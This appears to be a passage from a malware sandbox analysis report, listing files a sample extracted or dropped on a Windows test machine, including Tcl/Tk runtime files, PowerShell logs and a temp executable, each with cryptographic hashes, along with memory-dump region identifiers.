SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\onefile_3116_133629147297712041\VCRUNTIME140.dll

MD5 11d9ac94e8cb17bd23dea89f8e757f18
SHA1 d4fb80a512486821ad320c4fd67abcae63005158
SHA256 e1d6f78a72836ea120bd27a33ae89cbdc3f3ca7d9d0231aaa3aac91996d2fa4e
SHA512 aa6afd6bea27f554e3646152d8c4f96f7bcaaa4933f8b7c04346e410f93f23cfa6d29362fd5d51ccbb8b6223e094cd89e351f072ad0517553703f5bf9de28778

memory/3220-1001-0x0000000006150000-0x00000000064A4000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\onefile_3116_133629147297712041\_tkinter.pyd

MD5 0f1aa5b9a82b75b607b4ead6bb6b8be6
SHA1 5d58fd899018a106d55433ea4fcb22faf96b4b3d
SHA256 336bd5bffdc0229da4eaddbb0cfc42a9e55459a40e1322b38f7e563bda8dd190
SHA512 b32ea7d3ed9ae3079728c7f92e043dd0614a4da1dbf40ae3651043d35058252187c3c0ad458f4ca79b8b006575fac17246fb33329f7b908138f5de3c4e9b4e52

C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\tk86t.dll

MD5 e3c7ed5f9d601970921523be5e6fce2c
SHA1 a7ee921e126c3c1ae8d0e274a896a33552a4bd40
SHA256 bd4443b8ecc3b1f0c6fb13b264769253c80a4597af7181884bda20442038ec77
SHA512 bfa76b6d754259eabc39d701d359dd96f7a4491e63b17826a05a14f8fdf87656e8fc541a40e477e4fef8d0601320dd163199520e66d9ee8b5d6bb5cd9a275901

C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\tcl86t.dll

MD5 ad03d1e9f0121330694415f901af8f49
SHA1 ad8d3eee5274fef8bb300e2d1f4a11e27d3940df
SHA256 224476bedbcf121c69137f1df4dd025ae81769b2f7651bd3788a870a842cfbf9
SHA512 19b85c010c98fa75eacfd0b86f9c90a2dbf6f07a2b3ff5b4120108f3c26711512edf2b875a782497bdb3d28359325ad95c17951621c4b9c1fd692fde26b77c33

C:\Users\Admin\AppData\Local\Temp\onefile_3116_133629147297712041\tcl\init.tcl

MD5 e10e428598b2d5f2054cfae4a7029709
SHA1 f8e7490e977c3c675e76297638238e08c1a5e72e
SHA256 61c55633fa048deb120422daed84224f2bb12c7c94958ca6f679b219cf2fa939
SHA512 88ef7628af5b784229dda6772c6ddd77905238a1648d4290b496eafeec013107437218e4834b7198aeb098bc854dcb9f18083c76dd5bf3ce9cedf3d5c9e4faae

C:\Users\Admin\AppData\Local\Temp\onefile_3116_133629147297712041\tcl\encoding\cp1252.enc

MD5 5900f51fd8b5ff75e65594eb7dd50533
SHA1 2e21300e0bc8a847d0423671b08d3c65761ee172
SHA256 14df3ae30e81e7620be6bbb7a9e42083af1ae04d94cf1203565f8a3c0542ace0
SHA512 ea0455ff4cd5c0d4afb5e79b671565c2aede2857d534e1371f0c10c299c74cb4ad113d56025f58b8ae9e88e2862f0864a4836fed236f5730360b2223fde479dc

C:\Users\Admin\AppData\Local\Temp\onefile_3116_133629147297712041\tcl\http1.0\pkgIndex.tcl

MD5 10ec7cd64ca949099c818646b6fae31c
SHA1 6001a58a0701dff225e2510a4aaee6489a537657
SHA256 420c4b3088c9dacd21bc348011cac61d7cb283b9bee78ae72eed764ab094651c
SHA512 34a0acb689e430ed2903d8a903d531a3d734cb37733ef13c5d243cb9f59c020a3856aad98726e10ad7f4d67619a3af1018f6c3e53a6e073e39bd31d088efd4af

C:\Users\Admin\AppData\Local\Temp\onefile_3116_133629147297712041\tcl\opt0.4\pkgIndex.tcl

MD5 92ff1e42cfc5fecce95068fc38d995b3
SHA1 b2e71842f14d5422a9093115d52f19bcca1bf881
SHA256 eb9925a8f0fcc7c2a1113968ab0537180e10c9187b139c8371adf821c7b56718
SHA512 608d436395d055c5449a53208f3869b8793df267b8476ad31bcdd9659a222797814832720c495d938e34bf7d253ffc3f01a73cc0399c0dfb9c85d2789c7f11c0

C:\Users\Admin\AppData\Local\Temp\onefile_3116_133629147297712041\tk\button.tcl

MD5 cf6e5b2eb7681567c119040939dd6e2c
SHA1 3e0b905428c293f21074145fe43281f22e699eb4
SHA256 2f013b643d62f08ddaaa1dea39ff80d6607569c9e1acc19406377b64d75ccf53
SHA512 be03edea59be01d2b8de72b6ebe9dceb13d16c522bb5c042cdae83c84eafc6ac7b3650bf924f5f84f4f126634f9d17d74d087316d289f237129921a89aa4e0c8

C:\Users\Admin\AppData\Local\Temp\onefile_3116_133629147297712041\tk\listbox.tcl

MD5 b3b6a3bd19ddde4a97ea7cf95d7a8322
SHA1 2f11d97c091de9202f238778c89f13a94a10d3be
SHA256 b92526a55409c67473740551ca128498824d25406e3cc9bb0544e8296d3c5de4
SHA512 f2bc1fbbd20132725d283b9fab20c3e38ed185a62297e1418572c03fa90b3f813b878be281bb4bdfa1c813b7ee7eff11cbb2f89b5411b1707d90b0e5fd746fb3

C:\Users\Admin\AppData\Local\Temp\onefile_3116_133629147297712041\tk\ttk\sizegrip.tcl

MD5 3c8916a58c6ee1d61836e500a54c9321
SHA1 54f3f709698fad020a048668749cb5a09ede35ab
SHA256 717d2edd71076ea059903c7144588f8bbd8b0afe69a55cbf23953149d6694d33
SHA512 2b71569a5a96cac1b708e894a2466b1054c3fae5405e10799b182012141634bd2a7e9e9f516658e1a6d6e9e776e397608b581501a6cfe2eb4ec54459e9ecb267

C:\Users\Admin\AppData\Local\Temp\onefile_3116_133629147297712041\tk\ttk\vistaTheme.tcl

MD5 ad2d78020875529834dd0ea74251e2d3
SHA1 80cc99972a056396dd55e9505ccb02e16462b115
SHA256 ce1a53a769de9e230f586efafd2fb455980b45941e5db553bd3a2f0062b50f3e
SHA512 59ec21a44769fec0b462f0675217882ecf5cbc64056024e4259d91233a1397b4b89957bd474387c992a8753dc9c350fda7e6e5c6e9d29c655d62362a018e2194

C:\Users\Admin\AppData\Local\Temp\onefile_3116_133629147297712041\tk\ttk\xpTheme.tcl

MD5 1026799ffe26aaa8661f64d6f2cbe4dd
SHA1 5cd337feb3130d146134e06c4a1826ba29157e7a
SHA256 ff421674388da5d3a0c687f342f8d1e3c7f247f3cb59d5512b31f91a54a4c318
SHA512 90f1062caa87c0d65aede1d71370ebe35ad90f4033e6077169b7168b4754c0ff46a9f6348f4d907dcf20ab8f63bb6e0d106a05f068c5abeb86d26f5ea00f503c

C:\Users\Admin\AppData\Local\Temp\onefile_3116_133629147297712041\tcl\encoding\symbol.enc

MD5 1b612907f31c11858983af8c009976d6
SHA1 f0c014b6d67fc0dc1d1bbc5f052f0c8b1c63d8bf
SHA256 73fd2b5e14309d8c036d334f137b9edf1f7b32dbd45491cf93184818582d0671
SHA512 82d4a8f9c63f50e5d77dad979d3a59729cd2a504e7159ae3a908b7d66dc02090dabd79b6a6dc7b998c32c383f804aacabc564a5617085e02204adf0b13b13e5b

C:\Users\Admin\AppData\Local\Temp\onefile_3116_133629147297712041\tk\ttk\winTheme.tcl

MD5 8b4813a1c6915fd35b52ac854230bcc1
SHA1 db981087f2a311361446014fadbd8b199d856716
SHA256 05fad058280e7a8947a9f71122b442b92d7d578b4618b08bf0b71b6dac5aa22f
SHA512 e0a69e94aabd725b441d6c4920f1cd54451bcc00090d9319cb55286a46a7f35066d1959de149d900198f777671004f6d8a64e7d31e42f8a76e89ed122a79a9ff

C:\Users\Admin\AppData\Local\Temp\onefile_3116_133629147297712041\tk\ttk\clamTheme.tcl

MD5 beced087eeb3d5c9b2eabdb19c030d52
SHA1 be285e65905d335be442606afa3a88e408d5ec5b
SHA256 93c29536262c582104bf1804d7b06c7565b7d621f2e3605ff8b6c981a3b4ab01
SHA512 84b733c3fbe63c32b5b1e6cd132bd1b55f07b47612b70455c17c4d6d239682672c838cc3d739283079d0d2d8567fca9b763465d8d2148d25b5952282ed521a79

C:\Users\Admin\AppData\Local\Temp\onefile_3116_133629147297712041\tk\ttk\altTheme.tcl

MD5 ae1b9c4dc2de8e899749fb4e1fcb4df6
SHA1 2a09d325ca56c930b3afb1ee43c944fd4416b8e1
SHA256 92b8be9d8934850b6d240b970603b0ad7c6dd4a45134545694fb52966d742861
SHA512 2803f96729805c90143e0c4c9bf25398bac7d6e4402cb09be354c35566fc3c3bd9522372147c0e956bdbbc2943b9aecb0f5c96b527a26fd790b8fdb5b99efe10

C:\Users\Admin\AppData\Local\Temp\onefile_3116_133629147297712041\tk\ttk\classicTheme.tcl

MD5 70f3edfbfd4c16febdd8311290a0effe
SHA1 4b1d63d59c72c357931a8cbbf071654492a9b371
SHA256 c7b1f40d77820fbaf2195f2bb3f334b38fec653fe47653f9e30a01ad4ca63ba5
SHA512 a58c584ada6d271316266d58641be260f98e6fa0ae867ee9e343807a2955ddd3544b864cca80dc7f164ed4be5331575b696650ff0bb469c3647c5cb122f2a64c

C:\Users\Admin\AppData\Local\Temp\onefile_3116_133629147297712041\tk\ttk\defaults.tcl

MD5 16843ecd9e716a87d865a6539ef44751
SHA1 3df76af0d6e4c386d63dd061100702dbb0f72a42
SHA256 d83248b535a9417ce0ca598bbe245f24252adc90e3611c1191a045d9c0a9c99f
SHA512 7f5e7a200fd6b012a9336035211d9d89f0504f61156629ebcc1a03bcf8462ba8d219de376b6bb3ebb9e6a9507f0ac6f7d658eed5b953110df553b3c0c44ebc1d

C:\Users\Admin\AppData\Local\Temp\onefile_3116_133629147297712041\tk\ttk\treeview.tcl

MD5 5bec78db1a86b4bc17a5108806c5371e
SHA1 4b2b08240f778864c5045f546a620702ae126ccb
SHA256 0e05adf29b616989cb4724e57a26f1044598781f0cc10d5eb5ac4af7d705ddca
SHA512 29dff439bb5caa23f8f38ea136406fa2db68be021068f80bad2e2ec811ae5c5b08f4f287719db946db780122af05654392ea771fb523bdc1569b364689d3ec86

C:\Users\Admin\AppData\Local\Temp\onefile_3116_133629147297712041\tk\ttk\spinbox.tcl

MD5 ebce661f8125f54c7dff9f076fb2bfe2
SHA1 966603a85eadba4e003e8307a7e581cd6839716f
SHA256 7c2ffd7308bdea852851335d5b5eb5dcca0e4d4a0cea16f786b40009ffd58b71
SHA512 35f518e20986ab951ff33091f405ea1647534ccb77c8c36a94b1ab4a973df3ed52355864702b6526888830af8c912105e542027b5d68f81ac2a9f40ad2ba2632

C:\Users\Admin\AppData\Local\Temp\onefile_3116_133629147297712041\tk\ttk\combobox.tcl

MD5 06b885722c8555668bcbe8d7d9aa4c75
SHA1 8172c8886884de462549aa94fca440b99da90583
SHA256 057f8f447de3a753714b8f82b96054e1849a2424749f3482492eae192baacdcf
SHA512 d81ab53d48ed1d79da57fc2d2b599199ee985e237046244a2f820daacd2e8565c65d63e9b6f80175c30fd48290226a547d6d603293a4b7e4a455795f7fce7179

C:\Users\Admin\AppData\Local\Temp\onefile_3116_133629147297712041\tk\ttk\entry.tcl

MD5 3dea98c515f6f731e666656da9708f12
SHA1 212865fc5c635eeca380efc1b3fbb85554714c47
SHA256 fe32f8b154893218acaba93ac4b8e1170d9b3e3ab66df63df85c0a31c17592be
SHA512 2901b5f92df95cbd1ec71acf86646af2f1d6058232eef1b5779192bad6df0bbbbc5902e363f809671f06d13270b1581d55f611556d48b1a843194477a113aeab

C:\Users\Admin\AppData\Local\Temp\onefile_3116_133629147297712041\tk\ttk\panedwindow.tcl

MD5 a12915fa5caf93e23518e9011200f5a4
SHA1 a61f665a408c10419fb81001578d99b43d048720
SHA256 ce0053d637b580170938cf552b29ae890559b98eb28038c2f0a23a265ddeb273
SHA512 669e1d66f1223cca6ceb120914d5d876bd3cf401ee4a46f35825361076f19c7341695596a7dbb00d6cff4624666fb4e7a2d8e7108c3c56a12bda7b04e99e6f9a

C:\Users\Admin\AppData\Local\Temp\onefile_3116_133629147297712041\tk\ttk\notebook.tcl

MD5 82c9dfc512e143dda78f91436937d4dd
SHA1 26abc23c1e0c201a217e3cea7a164171418973b0
SHA256 d1e5267cde3d7be408b4c94220f7e1833c9d452bb9ba3e194e12a5eb2f9adb80
SHA512 a9d3c04ad67e0dc3f1c12f9e21ef28a61fa84dbf710313d4ca656bdf35dfbbfba9c268c018004c1f5614db3a1128025d795bc14b4fffaa5603a5313199798d04

C:\Users\Admin\AppData\Local\Temp\onefile_3116_133629147297712041\tk\ttk\progress.tcl

MD5 b0074341a4bda36bcdff3ebcae39eb73
SHA1 d070a01cc5a787249bc6dad184b249c4dd37396a
SHA256 a9c34f595e547ce94ee65e27c415195d2b210653a9ffcfb39559c5e0fa9c06f8
SHA512 af23563602886a648a42b03cc5485d84fcc094ab90b08df5261434631b6c31ce38d83a3a60cc7820890c797f6c778d5b5eff47671ce3ee4710ab14c6110dcc35

C:\Users\Admin\AppData\Local\Temp\onefile_3116_133629147297712041\tk\ttk\scale.tcl

MD5 b41a9df31924dea36d69cb62891e8472
SHA1 4c2877fbb210fdbbde52ea8b5617f68ad2df7b93
SHA256 25d0fe2b415292872ef7acdb2dfa12d04c080b7f9b1c61f28c81aa2236180479
SHA512 a50db6da3d40d07610629de45f06a438c6f2846324c3891c54c99074cfb7beed329f27918c8a85badb22c6b64740a2053b891f8e5d129d9b0a1ff103e7137d83

C:\Users\Admin\AppData\Local\Temp\onefile_3116_133629147297712041\tk\ttk\scrollbar.tcl

MD5 cf7bc1ffbf3efee2ca7369215a3b1473
SHA1 e2632241089f9dc47fa76cd0c57615d70753008c
SHA256 b3a0e10c95b28c90cccfc373152bd30ab7da2fb4c0e96409aeeb01d453f36b4a
SHA512 01841cda93aa0ce1a5b1fc65db153902b872b7e9d1030ef8902e086bbeb35649fd742dd96d1aed9cf620692fde6f4e2ccd865dc7a125452ffd16a65918956dda

C:\Users\Admin\AppData\Local\Temp\onefile_3116_133629147297712041\tk\ttk\menubutton.tcl

MD5 fe89894d8cbf415541a60d77192f0f94
SHA1 c0716b2d8e24592757b62d24eeed57121b60e00f
SHA256 d9af20135ef1bfeb3e0fd9fdabe821474de3ed43b3745a42fe564d24a8b9fd9c
SHA512 66488cbcac49cca47c9c560648e891d429f40e46549f58687b98073eba4807a8458a277be093ebfc50709a8a87a529df4e526eccfb60803ce16af17b97accd3d

C:\Users\Admin\AppData\Local\Temp\onefile_3116_133629147297712041\tk\ttk\button.tcl

MD5 ea7cf40852afd55ffda9db29a0e11322
SHA1 b7b42fac93e250b54eb76d95048ac3132b10e6d8
SHA256 391b6e333d16497c4b538a7bdb5b16ef11359b6e3b508d470c6e3703488e3b4d
SHA512 123d78d6ac34af4833d05814220757dccf2a9af4761fe67a8fe5f67a0d258b3c8d86ed346176ffb936ab3717cfd75b4fab7373f7853d44fa356be6e3a75e51b9

C:\Users\Admin\AppData\Local\Temp\onefile_3116_133629147297712041\tk\ttk\utils.tcl

MD5 f868a26a299885824b14ca28f68039ce
SHA1 e37a1889e6cc215102ec078d0455622415ed8486
SHA256 6c35cd6c7f3ac4be3fe0cc7633dbbde5123155921a441ba702b4347e6f967f34
SHA512 14d8fd30fe670ce4630ce5b7b1e4b04a2a3f97d6483d87d0d7a2b675e880ab75e947820a4babd337452d683e0cbb7b92b4c866af19a8dcd5711016e012d597e2

C:\Users\Admin\AppData\Local\Temp\onefile_3116_133629147297712041\tk\ttk\cursors.tcl

MD5 74596004dfdbf2ecf6af9c851156415d
SHA1 933318c992b705bf9f8511621b4458ecb8772788
SHA256 7bdffa1c2692c5d1cf67b518f9acb32fa4b4d9936ed076f4db835943bc1a00d6
SHA512 0d600b21db67bf9dadbdd49559573078efb41e473e94124ac4d2551bc10ec764846dc1f7674daa79f8d2a8aeb4ca27a5e11c2f30ede47e3ecee77d60d7842262

C:\Users\Admin\AppData\Local\Temp\onefile_3116_133629147297712041\tk\ttk\fonts.tcl

MD5 7017b5c1d53f341f703322a40c76c925
SHA1 57540c56c92cc86f94b47830a00c29f826def28e
SHA256 0eb518251fbe9cf0c9451cc1fef6bb6aee16d62da00b0050c83566da053f68d0
SHA512 fd18976a8fbb7e59b12944c2628dbd66d463b2f7342661c8f67160df37a393fa3c0ce7fdda31073674b7a46e0a0a7d0a7b29ebe0d9488afd9ef8b3a39410b5a8

C:\Users\Admin\AppData\Local\Temp\onefile_3116_133629147297712041\tk\ttk\ttk.tcl

MD5 e38b399865c45e49419c01ff2addce75
SHA1 f8a79cbc97a32622922d4a3a5694bccb3f19decb
SHA256 61baa0268770f127394a006340d99ce831a1c7ad773181c0c13122f7d2c5b7f6
SHA512 285f520b648f5ec70dd79190c3b456f4d6da2053210985f9e2c84139d8d51908296e4962b336894ee30536f09fae84b912bc2abf44a7011620f66cc5d9f71a8c

C:\Users\Admin\AppData\Local\Temp\onefile_3116_133629147297712041\tk\text.tcl

MD5 33230f852aac8a5368aeba1834dcec77
SHA1 beba97c48a110f4a9fe86f60e5fd4ca6ac55e964
SHA256 f26ed909a962d02bc03585a6c756f4fe992c311c7f53648137e427747120b441
SHA512 caac54334c4eb439c18f03eeb5de83aa6bbd6bb07b760a40c60f2d34f5ee1fdd542f83ad427059863f96b0a8f2cb96658171a7cd0c0c2c49e002bd02e6d418f6

C:\Users\Admin\AppData\Local\Temp\onefile_3116_133629147297712041\tk\spinbox.tcl

MD5 9971530f110ac2fb7d7ec91789ea2364
SHA1 ab553213c092ef077524ed56fc37da29404c79a7
SHA256 5d6e939b44f630a29c4fcb1e2503690c453118607ff301bef3c07fa980d5075a
SHA512 81b4cec39b03fbeca59781aa54960f0a10a09733634f401d5553e1aaa3ebf12a110c9d555946fcdd70a9cc897514663840745241ad741dc440bb081a12dcf411

C:\Users\Admin\AppData\Local\Temp\onefile_3116_133629147297712041\tk\scrlbar.tcl

MD5 b44265f793563ad2ad66865dec63b2c2
SHA1 23e6f7095066ed3b65998324021d665d810e6a93
SHA256 189e7ee4b67861001c714a55880db34acf7d626a816e18b04b232af9e6e33e81
SHA512 3911b13f42091620d8d96ed0cc950792175f88399912092161e1a71f564c7e72b6d448d3b761b6b6b73400ccc8fabd94cb3bfcc8cb3ad8ebdb590c3ffc623dfb

C:\Users\Admin\AppData\Local\Temp\onefile_3116_133629147297712041\tk\scale.tcl

MD5 1ce32cdaeb04c75bfceea5fb94b8a9f0
SHA1 cc7614c9eade999963ee78b422157b7b0739894c
SHA256 58c662dd3d2c653786b05aa2c88831f4e971b9105e4869d866fb6186e83ed365
SHA512 1ee5a187615ae32f17936931b30fea9551f9e3022c1f45a2bca81624404f4e68022fcf0b03fbd61820ec6958983a8f2fbfc3ad2ec158433f8e8de9b8fcf48476

C:\Users\Admin\AppData\Local\Temp\onefile_3116_133629147297712041\tk\panedwindow.tcl

MD5 2da0a23cc9d6fd970fe00915ea39d8a2
SHA1 dfe3dc663c19e9a50526a513043d2393869d8f90
SHA256 4adf738b17691489c71c4b9d9a64b12961ada8667b81856f7adbc61dffeadf29
SHA512 b458f3d391df9522d4e7eae8640af308b4209ce0d64fd490bfc0177fde970192295c1ea7229ce36d14fc3e582c7649460b8b7b0214e0ff5629b2b430a99307d4

C:\Users\Admin\AppData\Local\Temp\onefile_3116_133629147297712041\tk\menu.tcl

MD5 12ec5260eb7435c7170002e011fe8f17
SHA1 e88f5423a7133784a1a2d097c4e602e5de564034
SHA256 588727079af7ecc44755efe33ebb7414ad2ee68390fc249ce073d38e03c78a4e
SHA512 5848e5a642f0cfba8b456a6dcef711737229e5f59beb7981a52440a47f5ba9ec85374be8e8b1ccdd952ac71164da04ff88ef07204fd62509952db2cdb6503700

C:\Users\Admin\AppData\Local\Temp\onefile_3116_133629147297712041\tk\icons.tcl

MD5 2652aad862e8fe06a4eedfb521e42b75
SHA1 ed22459ad3d192ab05a01a25af07247b89dc6440
SHA256 a78388d68600331d06bb14a4289bc1a46295f48cec31ceff5ae783846ea4d161
SHA512 6ecfbb8d136444a5c0dbbce2d8a4206f1558bdd95f111d3587b095904769ac10782a9ea125d85033ad6532edf3190e86e255ac0c0c81dc314e02d95cca86b596

C:\Users\Admin\AppData\Local\Temp\onefile_3116_133629147297712041\tk\entry.tcl

MD5 1d9ff9bb7fedb472910776361510c610
SHA1 c190dd07bcc55741b9bdfc210f82df7b7c2fac81
SHA256 dd351da6288cf7e9f367fd97c97cb476193ff7461b25e31667e85fe720edea04
SHA512 85d25622f4e0c9517d8caa454ec4e81c8cbbec25e418f5a2d885d5561999cfb3c3026aac8bf1ca6f9b40993802fda86d60ff8fd2e30a77d56f1c1914af695f03

C:\Users\Admin\AppData\Local\Temp\onefile_3116_133629147297712041\tk\pkgIndex.tcl

MD5 d942ff6f65bba8eb6d264db7d876a488
SHA1 74d6ca77e6092d79f37e7a1dcd7cced2e89d89cb
SHA256 e0bac49b9a3f0e50be89f692273cea7b7462bfc3e054f323261ef99b708c70a3
SHA512 3ac7d992300252109606074aefb693a31cd5cceffb6d7b851a2c8895a0d5e165a139b7038657306128af39c44785b7b4da35b8e1aeb4c30f3f7e7cfcfb789c4c

C:\Users\Admin\AppData\Local\Temp\onefile_3116_133629147297712041\tcl\package.tcl

MD5 55e2db5dcf8d49f8cd5b7d64fea640c7
SHA1 8fdc28822b0cc08fa3569a14a8c96edca03bfbbd
SHA256 47b6af117199b1511f6103ec966a58e2fd41f0aba775c44692b2069f6ed10bad
SHA512 824c210106de7eae57a480e3f6e3a5c8fb8ac4bbf0a0a386d576d3eb2a3ac849bdfe638428184056da9e81767e2b63eff8e18068a1cf5149c9f8a018f817d3e5

C:\Users\Admin\AppData\Local\Temp\onefile_3116_133629147297712041\tcl8\8.5\msgcat-1.6.1.tm

MD5 db52847c625ea3290f81238595a915cd
SHA1 45a4ed9b74965e399430290bcdcd64aca5d29159
SHA256 4fdf70fdcedef97aa8bd82a02669b066b5dfe7630c92494a130fc7c627b52b55
SHA512 5a8fb4ada7b2efbf1cadd10dbe4dc7ea7acd101cb8fd0b80dad42be3ed8804fc8695c53e6aeec088c2d4c3ee01af97d148b836289da6e4f9ee14432b923c7e40

C:\Users\Admin\AppData\Local\Temp\onefile_3116_133629147297712041\tcl\tm.tcl

MD5 52db1cd97ceab81675e86fa0264ea539
SHA1 b31693b5408a847f97ee8004fed48e5891df6e65
SHA256 6c02298d56e3c4c6b197afc79ec3ce1fc37ae176dc35f5d7ac48246f05f91669
SHA512 5032b0a79d0cd5a342af2f9edf8b88b7214e9aa61ba524a42c5be2286741e18fa380ad2d40dda9a0257afceed2ef6e48624013e854f37b5e41cb88a831ad04c9

C:\Users\Admin\AppData\Local\Temp\onefile_3116_133629147297712041\tk\tk.tcl

MD5 25094462d2ea6b43133275bf4db31a60
SHA1 6bb76294e8fdf4d40027c9d1b994f1ab0014b81b
SHA256 3e998b41ab23677db31902e1e876e644b279b2e6d8896443f6c434352801cdd1
SHA512 8bdae921f367b864ea7f36c9a549ee870d4e4e3c6e942d70722a84ae6b23ff00a33638d8ca8f3b9b8fe084875ba7c8976975849f4dc47cdb5671df47af68cfab

C:\Users\Admin\AppData\Local\Temp\onefile_3116_133629147297712041\tcl\auto.tcl

MD5 5e9b3e874f8fbeaadef3a004a1b291b5
SHA1 b356286005efb4a3a46a1fdd53e4fcdc406569d0
SHA256 f385515658832feb75ee4dce5bd53f7f67f2629077b7d049b86a730a49bd0840
SHA512 482c555a0da2e635fa6838a40377eef547746b2907f53d77e9ffce8063c1a24322d8faa3421fc8d12fdcaff831b517a65dafb1cea6f5ea010bdc18a441b38790

C:\Users\Admin\AppData\Local\Temp\onefile_3116_133629147297712041\tcl\tclIndex

MD5 996f74f323ea95c03670734814b7887f
SHA1 49f4b9be5ab77e6ccab8091f315d424d7ac183f3
SHA256 962c60eb7e050061462ff72cec9741a7f18307af4aaa68d7665174f904842d13
SHA512 c4694260c733dc534dc1a70791fa29b725efd078a6846434883362f06f7bf080ca07478208b1909630e1b55fbdccf14484b78b0a5b8c6dad90f190c8c9d88a56

memory/3220-1055-0x0000000006690000-0x00000000066AE000-memory.dmp

memory/4276-1056-0x000001D4243E0000-0x000001D424402000-memory.dmp

memory/3220-1064-0x0000000006740000-0x000000000678C000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 d85ba6ff808d9e5444a4b369f5bc2730
SHA1 31aa9d96590fff6981b315e0b391b575e4c0804a
SHA256 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA512 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 59d97011e091004eaffb9816aa0b9abd
SHA1 1602a56b01dd4b7c577ca27d3117e4bcc1aa657b
SHA256 18f381e0db020a763b8c515c346ef58679ab9c403267eacfef5359e272f7e71d
SHA512 d9ca49c1a17580981e2c1a50d73c0eecaa7a62f8514741512172e395af2a3d80aeb0f71c58bc7f52c18246d57ba67af09b6bff4776877d6cc6f0245c30e092d6

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 9a2c763c5ff40e18e49ad63c7c3b0088
SHA1 4b289ea34755323fa869da6ad6480d8d12385a36
SHA256 517807921c55bd16cd8a8bfae3d5dc19444c66f836b66acd5593e3080acbaf8e
SHA512 3af01926bc7de92076067d158d7250b206d396b3282ee0db43639d04d91bd9ff763acbce12c7822914824984a3c5fdd1b8dbf1ad2ee88233d47f0f808b746bc8

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 fe9b96bc4e29457b2d225a5412322a52
SHA1 551e29903e926b5d6c52a8f57cf10475ba790bd0
SHA256 e81b9bfd38a5199813d703d5caf75baa6f62847b2b9632302b5d6f10dd6cf997
SHA512 ff912526647f6266f37749dfdc3ed5fd37c35042ba481331434168704c827d128c22093ba73d7ad0cecde10365f0978fcd3f3e2af1a1c280cd2e592a62d5fa80

memory/3220-1102-0x0000000007F90000-0x000000000860A000-memory.dmp

memory/3220-1103-0x0000000006C80000-0x0000000006C9A000-memory.dmp

memory/4088-1104-0x0000000006CF0000-0x0000000006D22000-memory.dmp

memory/4088-1105-0x0000000074890000-0x00000000748DC000-memory.dmp

memory/4088-1115-0x0000000006CD0000-0x0000000006CEE000-memory.dmp

memory/4088-1116-0x0000000007770000-0x0000000007813000-memory.dmp

memory/3220-1118-0x0000000008BC0000-0x0000000009164000-memory.dmp

memory/3220-1119-0x0000000007B30000-0x0000000007BC2000-memory.dmp

memory/4088-1121-0x0000000007AA0000-0x0000000007AAA000-memory.dmp

memory/4088-1125-0x0000000007CC0000-0x0000000007D56000-memory.dmp

memory/4088-1126-0x0000000007C30000-0x0000000007C41000-memory.dmp

memory/4088-1127-0x0000000006B00000-0x0000000006B0E000-memory.dmp

memory/4088-1128-0x0000000007C90000-0x0000000007CA4000-memory.dmp

memory/4088-1129-0x0000000007D80000-0x0000000007D9A000-memory.dmp

memory/4088-1130-0x0000000007CB0000-0x0000000007CB8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\cffckp.exe

MD5 32004d8a59efe46298e06798a1a96cb9
SHA1 da3c34b6d7d4f692e673e45dacc825b3ef17a2ed
SHA256 03ca5525ec9b76e0d61787679977fff9ed515e7c9d30100ba7d8499a8b62a47f
SHA512 34c25e4b7ec2f61c6df8da73a720a91ec01762b06be8b12308876711e6a3b44f2633b27a38f2c516ff0925cb5829b70e993167e989ceb9a328d7422f7ab41495

memory/4336-1267-0x0000021530140000-0x000002153015C000-memory.dmp

memory/4336-1268-0x0000021530130000-0x000002153013A000-memory.dmp

memory/4336-1269-0x00000215302A0000-0x00000215302A8000-memory.dmp

memory/4336-1270-0x00000215302B0000-0x00000215302BA000-memory.dmp